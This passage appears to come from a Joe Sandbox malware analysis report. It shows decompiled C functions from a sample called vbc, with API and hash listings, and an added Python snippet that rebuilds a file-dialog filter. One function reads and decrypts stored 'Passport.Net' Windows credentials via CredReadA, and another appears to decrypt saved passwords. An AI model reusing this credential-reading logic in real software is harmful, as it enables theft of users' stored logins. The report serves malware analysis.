                                                                                                                                                                        Uniqueness Score: -1.00%
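
The function E0040AC6E above builds its file-type filter from eight {string-table entry, pattern} pairs and hands it, together with a packed default extension, to a GetSaveFileNameA wrapper. As an added example, not code from the sample or from the sandbox report, the Python below lays those pairs out in the Win32 lpstrFilter format (every string NUL-terminated, the list closed by one extra NUL) and parses such a block back, which is the check one would run on a buffer carved from the 0x400000 dump. The description texts behind resource IDs 0x1f5..0x1fc are not on the page, so load_string_stub substitutes constructed placeholders; the exact bytes E0040687C writes are not shown either, so the builder follows the documented filter layout rather than claiming to reproduce that function.

```python
"""Rebuild and parse the Win32 OPENFILENAME filter block that E0040AC6E appears to assemble.

Added illustration, not code recovered from the sample. The eight pattern strings and the
order of resource IDs come from the decompiled function; the description texts for
resource IDs 0x1f5..0x1fc are NOT on the page, so placeholders are constructed here.
"""
from typing import List, Tuple

# (resource_id, pattern) in the order the decompiled function stores them (_v72 .. _v12).
DECOMPILED_PAIRS: List[Tuple[int, str]] = [
    (0x1F5, "*.txt"),
    (0x1F6, "*.txt"),
    (0x1F7, "*.txt"),
    (0x1F8, "*.htm;*.html"),
    (0x1F9, "*.htm;*.html"),
    (0x1FA, "*.xml"),
    (0x1FB, "*.csv"),
    (0x1FC, "*.csv"),
]


def load_string_stub(resource_id: int) -> str:
    """Constructed stand-in for the LoadStringA-backed helper E00407A69.
    The real string-table text is not available on the page."""
    return f"<string #{resource_id:#x}>"


def packed_dword_to_ascii(value: int) -> str:
    """Decode a constant such as 0x747874 the way the compiler stored it:
    little-endian bytes 74 78 74 00 -> 'txt'. Stops at the first NUL."""
    raw = value.to_bytes(4, "little")
    return raw.split(b"\x00", 1)[0].decode("ascii")


def build_filter_block(pairs: List[Tuple[str, str]]) -> bytes:
    """Lay out (description, pattern) pairs as lpstrFilter expects: each string
    NUL-terminated, and the whole list terminated by an additional NUL."""
    out = bytearray()
    for desc, pat in pairs:
        out += desc.encode("ascii") + b"\x00" + pat.encode("ascii") + b"\x00"
    out += b"\x00"
    return bytes(out)


def parse_filter_block(block: bytes) -> List[Tuple[str, str]]:
    """Inverse of build_filter_block, usable on a buffer carved from a memory dump.
    Raises ValueError if the terminator is missing or the strings do not pair up."""
    if not block.endswith(b"\x00\x00"):
        raise ValueError("filter block is not double-NUL terminated")
    parts = block[:-2].split(b"\x00")  # drop the last pattern's NUL and the list terminator
    if len(parts) % 2:
        raise ValueError("unpaired description/pattern string")
    return [
        (parts[i].decode("ascii"), parts[i + 1].decode("ascii"))
        for i in range(0, len(parts), 2)
    ]


def reconstruct_dialog_arguments() -> dict:
    """Mirror the data flow of E0040AC6E: resolve the descriptions, assemble the
    filter block, and decode the default extension held in _v8 (0x747874)."""
    pairs = [(load_string_stub(rid), pat) for rid, pat in DECOMPILED_PAIRS]
    return {
        "filter": build_filter_block(pairs),
        "default_ext": packed_dword_to_ascii(0x747874),
        "pattern_set": sorted({pat for _, pat in pairs}),
    }


if __name__ == "__main__":
    args = reconstruct_dialog_arguments()
    for desc, pat in parse_filter_block(args["filter"]):
        print(f"{desc:18} {pat}")
    print("default extension:", args["default_ext"])
```

The sorted pattern set the reconstruction produces is the same four strings the report lists under String ID for this function, which is a quick sanity check that the pairs were read off the decompiled stack layout correctly.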

                                                                                                                                                                        C-Code - Quality: 95%
			E00403A67(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E00412360(0x6004, __ecx);                    // 0x6004-byte stack probe for the large locals below (compiler __chkstk-style helper)
				_v24584 = 0;                                 // 0x4000-byte buffer zeroed in two steps: first 16-bit element, then the rest
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;                                  // 0x2000-byte buffer zeroed the same way
				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                                        				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                                                                                                                        				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                                        				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00403A8C
                                                                                                                                                                        • memset.MSVCRT ref: 00403AA5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403ABC
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403ADB
                                                                                                                                                                        • strlen.MSVCRT ref: 00403AED
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1786725549-0
                                                                                                                                                                        • Opcode ID: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                        • Instruction ID: 60d5cd2968a458345304ed859c80f0f17d47a7f7ae6e16c58bf0b652b2e175c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 3f400ef8c2c76e934e80ec81a0c92b5e5fe334d0f7b850a86132a32295095dc5
                                                                                                                                                                        • Instruction Fuzzy Hash: B8116DB650012CBEFB009B94DD85DEBB7ADEF08354F0041A2B719E2091D6759F54CB78
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040ADA4(void* __eax, void* __ebx) {
                                                                                                                                                                        				char _v264;
                                                                                                                                                                        				char _v524;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				long _t13;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				int _t19;
                                                                                                                                                                        				long _t20;
                                                                                                                                                                        				void* _t27;
                                                                                                                                                                        				void* _t31;
                                                                                                                                                                        
                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                        				_t31 = __eax;
                                                                                                                                                                        				_t13 = GetTempPathA(0x104,  &_v524);
                                                                                                                                                                        				_t32 = _t13;
                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                        					GetWindowsDirectoryA( &_v524, 0x104);
                                                                                                                                                                        				}
                                                                                                                                                                        				_v264 = 0;
                                                                                                                                                                        				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                                                                                                                        				_t18 = E0040AD61(_t31, _t32,  &_v264, 2, 1);
                                                                                                                                                                        				if(_t18 != 0) {
                                                                                                                                                                        					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                                                                                                                        					_t34 = _t19;
                                                                                                                                                                        					if(_t19 == 0) {
                                                                                                                                                                        						_t20 = GetLastError();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t20 = E00405FD0(_t27, 0x104, _t31, _t34,  &_v264);
                                                                                                                                                                        					}
                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                        						E00405F4B(_t20,  *(_t31 + 0x108));
                                                                                                                                                                        					}
                                                                                                                                                                        					return DeleteFileA( &_v264);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t18;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ADBE
                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ADD0
                                                                                                                                                                        • GetTempFileNameA.KERNEL32(?,0041444C,00000000,?), ref: 0040ADF2
                                                                                                                                                                        • OpenClipboard.USER32(?), ref: 0040AE12
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040AE2B
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AE48
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2014771361-0
                                                                                                                                                                        • Opcode ID: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                        • Instruction ID: 7dfed4210218cbe3633ab85fc006b2e48c808a0cdacf0b0ca9692cf87dba871e
                                                                                                                                                                        • Opcode Fuzzy Hash: b36e7ecf8624d8c90ea66491b75dc4c52724ce01200d4d7616f195176cae1ddb
                                                                                                                                                                        • Instruction Fuzzy Hash: 071165725443186BDB209B61DC49FCB7BBCAF14706F0441B6F689E2091EB78DAC48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                        			E00410596(intOrPtr* __edi) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				intOrPtr _t19;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                        
                                                                                                                                                                        				_t16 = __edi;
                                                                                                                                                                        				_t9 =  *(__edi + 0x1c);
                                                                                                                                                                        				 *__edi = 0x415314;
                                                                                                                                                                        				if(_t9 != 0) {
                                                                                                                                                                        					_push(_t9);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                                                                                                                                        				if(_t18 != 0) {
		_t9 = E00406B8A(_t18);
		_push(_t18);
		L00412096();
	}
	_t19 =  *((intOrPtr*)(_t16 + 0x45c));
	if(_t19 != 0) {
		_t9 = E00406B8A(_t19);
		_push(_t19);
		L00412096();
	}
	_t20 =  *((intOrPtr*)(_t16 + 0x458));
	if(_t20 != 0) {
		_t9 = E00406B8A(_t20);
		_push(_t20);
		L00412096();
	}
	_t21 =  *((intOrPtr*)(_t16 + 0x454));
	if(_t21 != 0) {
		_t9 = E00406A7D(_t21);
		_push(_t21);
		L00412096();
	}
	_t22 =  *((intOrPtr*)(_t16 + 0x450));
	if(_t22 != 0) {
		_t9 = E00406A7D(_t22);
		_push(_t22);
		L00412096();
	}
	return _t9;
}

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
• Instruction ID: 21774ca54697e01c1adc3851c2de10052fd52e5bfec277bf8b6dbebc5e22beff
• Opcode Fuzzy Hash: 9b5ba93a1d4d3230e71c89aa2b3a4c501730c6cf36628ebb8de87475de4246d9
• Instruction Fuzzy Hash: 55014872906D316BC5357A3559017DBA3947F05B19B06020FFA09B73424BAC7CE0C9DD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 44%
E004016E5(void* __ebx) {
	struct tagRECT _v20;
	struct tagPAINTSTRUCT _v84;

	GetClientRect( *(__ebx + 0x10),  &_v20);
	_v20.left = _v20.right - GetSystemMetrics(0x15);
	_v20.top = _v20.bottom - GetSystemMetrics(0x14);
	asm("movsd");
	asm("movsd");
	asm("movsd");
	asm("movsd");
	DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
	return EndPaint( *(__ebx + 0x10),  &_v84);
}

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
• Instruction ID: 87b9e555b8a68b0804226e1a7d1b9f87043edf3c617a3ea881a1d9d020f86292
• Opcode Fuzzy Hash: 2260b63d1688647689794fdb84e8332651a2a8fc8b06cd3bb88943ade092d718
• Instruction Fuzzy Hash: 0D01FB72900218BFDF04DFA8DC499FE7BBDFB45702F004469EE11AA194DAB1AA08CB54
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 96%
E00411A0F(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
	signed int _v8;
	char _v16;
	char _v24;
	char _v116;
	void _v1156;
	char _v1164;
	void _v1171;
	char _v1172;
	char _v2188;
	void _v2195;
	void _v2196;
	void _v3251;
	void _v3252;
	char _v4020;
	void* __edi;
	void* __esi;
	void* _t96;
	char _t105;
	intOrPtr _t112;
	void* _t115;
	signed int _t116;
	int _t121;
	signed int* _t122;
	void* _t124;
	void* _t125;
	signed int _t128;
	signed int* _t129;
	void* _t132;

	_t116 = __edx;
	_t105 = 0;
	_v2196 = 0;
	memset( &_v2195, 0, 0x3ff);
	_v3252 = 0;
	memset( &_v3251, 0, 0x41e);
	_v1172 = 0;
	memset( &_v1171, 0, 0x41e);
	_a8 = E00411533(_a8,  &_v2196);
	_t121 = strlen(_a4);
	if(_a8 > 8) {
		_t137 = _t121;
		if(_t121 > 0) {
			memcpy( &_v3252, _a4, _t121);
			memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
			E0040BE2A( &_v116);
			_t19 = _t121 + 8; // 0x8
			E0040BE4E(_t19,  &_v116,  &_v3252);
			_t127 =  &_v116;
			E0040BEEC(_t121,  &_v116,  &_v1172);
			_t23 = _t121 + 8; // 0x8
			memcpy( &_v1156,  &_v3252, _t23);
			E0040BE2A( &_v116);
			_t27 = _t121 + 0x18; // 0x18
			E0040BE4E(_t27, _t127,  &_v1172);
			E0040BEEC(_t121, _t127,  &_v24);
			E00405364( &_v4020, _t137,  &_v1164,  &_v24);
			_t122 = _a12;
			E004053E0( &_v16,  &_v1172, _t122,  &_v4020);
			_t112 = _a8;
                                                                                                                                                                        						_t128 = 0;
                                                                                                                                                                        						if(_t112 >= 0x18) {
                                                                                                                                                                        							_t37 = _t112 - 0x18; // -16
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t128 > _t105) {
                                                                                                                                                                        							_a4 =  &_v2188;
                                                                                                                                                                        							_t125 = _t122 + 8;
                                                                                                                                                                        							_v8 = _t128;
                                                                                                                                                                        							do {
                                                                                                                                                                        								E004053E0(_a4, _t112, _t125,  &_v4020);
                                                                                                                                                                        								_a4 = _a4 + 8;
                                                                                                                                                                        								_t125 = _t125 + 8;
                                                                                                                                                                        								_t45 =  &_v8;
                                                                                                                                                                        								 *_t45 = _v8 - 1;
                                                                                                                                                                        								_pop(_t112);
                                                                                                                                                                        							} while ( *_t45 != 0);
                                                                                                                                                                        							_t112 = _a8;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t96 = 8 + _t128 * 8;
                                                                                                                                                                        						_t50 = _t96 + 8; // 0x8
                                                                                                                                                                        						if(_t50 > _t112) {
                                                                                                                                                                        							_t51 = _t112 - 8; // 0x0
                                                                                                                                                                        							_t96 = _t51;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t96 > _t105) {
                                                                                                                                                                        							_t129 = _a12;
                                                                                                                                                                        							_t124 =  &_v2188 - _t129;
                                                                                                                                                                        							_t115 = _t96;
                                                                                                                                                                        							do {
                                                                                                                                                                        								 *_t129 =  *_t129 ^  *(_t124 + _t129);
                                                                                                                                                                        								_t129 =  &(_t129[0]);
                                                                                                                                                                        								_t115 = _t115 - 1;
                                                                                                                                                                        							} while (_t115 != 0);
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((char*)(_t96 + _a12)) = _t105;
                                                                                                                                                                        						 *_a16 = 1;
                                                                                                                                                                        						_t105 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t105;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00411A30
                                                                                                                                                                        • memset.MSVCRT ref: 00411A49
                                                                                                                                                                        • memset.MSVCRT ref: 00411A5D
                                                                                                                                                                          • Part of subcall function 00411533: strlen.MSVCRT ref: 00411540
                                                                                                                                                                        • strlen.MSVCRT ref: 00411A79
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411A9E
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411AB4
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEDF
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF0B
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF21
                                                                                                                                                                          • Part of subcall function 0040BEEC: memcpy.MSVCRT ref: 0040BF58
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF62
                                                                                                                                                                        • memcpy.MSVCRT ref: 00411AF4
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BE91
                                                                                                                                                                          • Part of subcall function 0040BE4E: memcpy.MSVCRT ref: 0040BEBB
                                                                                                                                                                          • Part of subcall function 0040BEEC: memset.MSVCRT ref: 0040BF33
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset$strlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2142929671-0
                                                                                                                                                                        • Opcode ID: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                        • Instruction ID: 6f2ed515a41b06c6c22f205846f23ff7f18478afa58802cd03ca93c0f6d1378b
                                                                                                                                                                        • Opcode Fuzzy Hash: 89ceb3d21e91c6af02e864f567a05f0a8fa48fa73525340af3882809b2e08623
                                                                                                                                                                        • Instruction Fuzzy Hash: 29512B7290015DAACB14DF55CC81AEEB7A9FF04308F5441BAE609E7151EB34AA89CF98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 36%
E00407A69(signed short __ebx) {
    signed int _t17;
    void* _t18;
    intOrPtr _t23;
    void* _t31;
    signed short _t39;
    signed int _t40;
    void* _t51;
    int _t56;
    void* _t57;
    int _t67;

    _t39 = __ebx;
    if( *0x418540 == 0) {
        E004079E7();
    }
    _t40 =  *0x418538;
    _t17 = 0;
    if(_t40 <= 0) {
        L5:
        _t51 = 0;
    } else {
        while(_t39 !=  *((intOrPtr*)( *0x418530 + _t17 * 4))) {
            _t17 = _t17 + 1;
            if(_t17 < _t40) {
                continue;
            } else {
                goto L5;
            }
            goto L6;
        }
        _t51 =  *((intOrPtr*)( *0x418534 + _t17 * 4)) +  *0x418528;
    }
    L6:
    if(_t51 != 0) {
        L22:
        _t18 = _t51;
    } else {
        if((_t39 & 0x00010000) == 0) {
            if( *0x4181b8 == 0) {
                _push( *0x418548 - 1);
                _push( *0x41852c);
                _push(_t39);
                _push(E00407BBF());
                goto L16;
            } else {
                strcpy(0x4182c0, "strings");
                _t31 = E00407EF3(_t39,  *0x41852c);
                _t57 = _t57 + 0x10;
                if(_t31 == 0) {
                    L14:
                    _push( *0x418548 - 1);
                    _push( *0x41852c);
                    _push(_t39);
                    goto L9;
                } else {
                    _t56 = strlen( *0x41852c);
                    if(_t56 == 0) {
                        goto L14;
                    }
                }
            }
        } else {
            _push( *0x418548 - 1);
            _push( *0x41852c);
            _push(_t39 & 0x0000ffff);
            L9:
            _push( *0x417b94);
            L16:
            _t56 = LoadStringA();
            _t67 = _t56;
        }
        if(_t67 <= 0) {
            L21:
            _t18 = 0x41344f;
        } else {
            _t23 =  *0x41853c;
            if(_t23 + _t56 + 2 >=  *0x418540 ||  *0x418538 >=  *0x418544) {
                goto L21;
            } else {
                _t51 = _t23 +  *0x418528;
                _t10 = _t56 + 1; // 0x1
                memcpy(_t51,  *0x41852c, _t10);
                 *((intOrPtr*)( *0x418534 +  *0x418538 * 4)) =  *0x41853c;
                 *( *0x418530 +  *0x418538 * 4) = _t39;
                 *0x418538 =  *0x418538 + 1;
                 *0x41853c =  *0x41853c + _t56 + 1;
                if(_t51 != 0) {
                    goto L22;
                } else {
                    goto L21;
                }
            }
        }
    }
    return _t18;
}













                                                                                                                                                                        0x00407a69
                                                                                                                                                                        0x00407a70
                                                                                                                                                                        0x00407a72
                                                                                                                                                                        0x00407a72
                                                                                                                                                                        0x00407a77
                                                                                                                                                                        0x00407a7e
                                                                                                                                                                        0x00407a83
                                                                                                                                                                        0x00407a95
                                                                                                                                                                        0x00407a95
                                                                                                                                                                        0x00407a85
                                                                                                                                                                        0x00407a85
                                                                                                                                                                        0x00407a90
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407a93
                                                                                                                                                                        0x00407ac9
                                                                                                                                                                        0x00407ac9
                                                                                                                                                                        0x00407a97
                                                                                                                                                                        0x00407a99
                                                                                                                                                                        0x00407bba
                                                                                                                                                                        0x00407bba
                                                                                                                                                                        0x00407a9f
                                                                                                                                                                        0x00407aa5
                                                                                                                                                                        0x00407ad8
                                                                                                                                                                        0x00407b24
                                                                                                                                                                        0x00407b25
                                                                                                                                                                        0x00407b2b
                                                                                                                                                                        0x00407b31
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407ada
                                                                                                                                                                        0x00407ae4
                                                                                                                                                                        0x00407af0
                                                                                                                                                                        0x00407af5
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407b0e
                                                                                                                                                                        0x00407b14
                                                                                                                                                                        0x00407b15
                                                                                                                                                                        0x00407b1b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407afc
                                                                                                                                                                        0x00407b07
                                                                                                                                                                        0x00407b0c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407b0c
                                                                                                                                                                        0x00407afa
                                                                                                                                                                        0x00407aa7
                                                                                                                                                                        0x00407aad
                                                                                                                                                                        0x00407aae
                                                                                                                                                                        0x00407ab7
                                                                                                                                                                        0x00407ab8
                                                                                                                                                                        0x00407ab8
                                                                                                                                                                        0x00407b32
                                                                                                                                                                        0x00407b38
                                                                                                                                                                        0x00407b3a
                                                                                                                                                                        0x00407b3a
                                                                                                                                                                        0x00407b3c
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407bb3
                                                                                                                                                                        0x00407b3e
                                                                                                                                                                        0x00407b3e
                                                                                                                                                                        0x00407b4d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407b5d
                                                                                                                                                                        0x00407b63
                                                                                                                                                                        0x00407b66
                                                                                                                                                                        0x00407b71
                                                                                                                                                                        0x00407b87
                                                                                                                                                                        0x00407b95
                                                                                                                                                                        0x00407ba0
                                                                                                                                                                        0x00407bac
                                                                                                                                                                        0x00407bb1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407bb1
                                                                                                                                                                        0x00407b4d
                                                                                                                                                                        0x00407b3c
                                                                                                                                                                        0x00407bbe

APIs
• strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,73B74DE0), ref: 00407AE4
  • Part of subcall function 00407EF3: _itoa.MSVCRT ref: 00407F14
• strlen.MSVCRT ref: 00407B02
• LoadStringA.USER32 ref: 00407B32
• memcpy.MSVCRT ref: 00407B71
  • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A0F
  • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A2D
  • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A4B
  • Part of subcall function 004079E7: ??2@YAPAXI@Z.MSVCRT ref: 00407A5B
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$LoadString_itoamemcpystrcpystrlen
• String ID: strings
• API String ID: 1748916193-3030018805
• Opcode ID: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
• Instruction ID: 4e35bd01ad2207757dd6e5c19dba2cefa7e6d732e740aa6e4bc5455c9760af59
• Opcode Fuzzy Hash: 6e661332ea860a5f04e72777378fa8c32be9495fca781d8f2a47ed500e910e65
• Instruction Fuzzy Hash: BA315771A08101AFD7159B58ED80DA63777E744348750807EEC01A72A2DF39BD81CF5E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 64%
E0040DC39(char* __ebx, void* __eflags) {
	char _v8;
	short* _v12;
	int _v16;
	intOrPtr _v20;
	char _v24;
	intOrPtr _v28;
	char _v32;
	intOrPtr _v48;
	intOrPtr _v52;
	int _v56;
	char _v60;
	char _v584;
	void* __edi;
	void* __esi;
	void* _t36;
	intOrPtr _t44;
	void* _t47;
	char _t63;
	int _t69;
	void* _t74;

	_t74 = __eflags;
	_t69 = 0;
	E004046E1( &_v584);
	_v60 = 0;
	_v56 = 0;
	_t36 = E00404651( &_v60, 0, _t74);
	_t75 = _t36;
	if(_t36 != 0 && E004047AA( &_v584, _t75) != 0) {
		_push( &_v8);
		_push(0);
		_push(4);
		_push("Passport.Net\\*");
		if(_v52() != 0) {
			_t44 = _v8;
			if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
				_v32 =  *((intOrPtr*)(_t44 + 0x18));
				_v28 =  *((intOrPtr*)(_t44 + 0x1c));
				_t47 = 0;
				_t63 = 0x4a;
				do {
					_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
					 *(_t47 + 0x418768) =  *_t14 << 2;
					_t47 = _t47 + 2;
				} while (_t47 < _t63);
				_v24 = _t63;
				_v20 = 0x418768;
				if(E0040481B( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
					if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
						strcpy(__ebx,  *(_v8 + 0x30));
						_t69 = 1;
					}
					LocalFree(_v12);
				}
				_t44 = _v8;
			}
			_v48(_t44);
		}
	}
	E004046CC( &_v60);
	E004047FB( &_v584);
	return _t69;
}
0x0040dc39
0x0040dc4a
0x0040dc4c
0x0040dc54
0x0040dc57
0x0040dc5a
0x0040dc5f
0x0040dc61
0x0040dc77
0x0040dc78
0x0040dc79
0x0040dc7b
0x0040dc85
0x0040dc8b
0x0040dc91
0x0040dca3
0x0040dcab
0x0040dcae
0x0040dcb0
0x0040dcb1
0x0040dcb1
0x0040dcbc
0x0040dcc4
0x0040dcc5
0x0040dcdb
0x0040dcde
0x0040dcec
0x0040dd0d
0x0040dd26
0x0040dd2f
0x0040dd2f
0x0040dd33
0x0040dd33
0x0040dd39
0x0040dd39
0x0040dd3d
0x0040dd3d
0x0040dc85
0x0040dd43
0x0040dd4e
0x0040dd58

APIs
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 00404651: LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
  • Part of subcall function 00404651: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
